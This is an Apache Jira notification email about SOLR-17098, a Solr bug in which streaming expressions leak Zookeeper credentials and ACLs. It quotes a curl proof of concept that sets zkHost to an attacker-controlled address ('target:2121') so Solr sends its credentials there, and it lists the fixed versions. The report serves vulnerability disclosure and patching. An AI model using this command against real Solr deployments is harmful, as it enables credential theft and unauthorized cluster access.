[
https://issues.apache.org/jira/browse/SOLR-17098?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18081007#comment-18081007
]
Houston Putman commented on SOLR-17098:
---------------------------------------
Yeah I think that makes sense to me!
> Zookeeper Credential Information Disclosure bug via Streaming Expressions
> -------------------------------------------------------------------------
>
> Key: SOLR-17098
> URL: https://issues.apache.org/jira/browse/SOLR-17098
> Project: Solr
> Issue Type: Bug
> Components: streaming expressions
> Reporter: Houston Putman
> Assignee: Houston Putman
> Priority: Blocker
> Fix For: 8.11.3, 9.4.1
>
> Attachments: SOLR-17098-1.diff, SOLR-17098.diff
>
>
> Security list thread:
> [https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh]
>
> ZK Credentials and ACLs can be exposed to any endpoint when the Streaming
> Handler is used:
>
> {{curl --data-urlencode 'expr=search(collection1,}}
> {{ zkHost="target:2121",}}
> {{ qt="/export",}}
> {{ q="*:*",}}
> {{ fl="id,a_s,a_i,a_f",}}
> {{ sort="a_f asc, a_i asc")' [http://localhost:8983/solr/demo/stream]}}
>
> In the command above, if the Solr instance has any Zookeeper Credentials or
> ACLs provided, then that information will be sent to the "target:2121"
> address. An attacker could set up a mock Zookeeper service to obtain the
> credentials, and then gain access to the Solr's Zookeeper Nodes.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
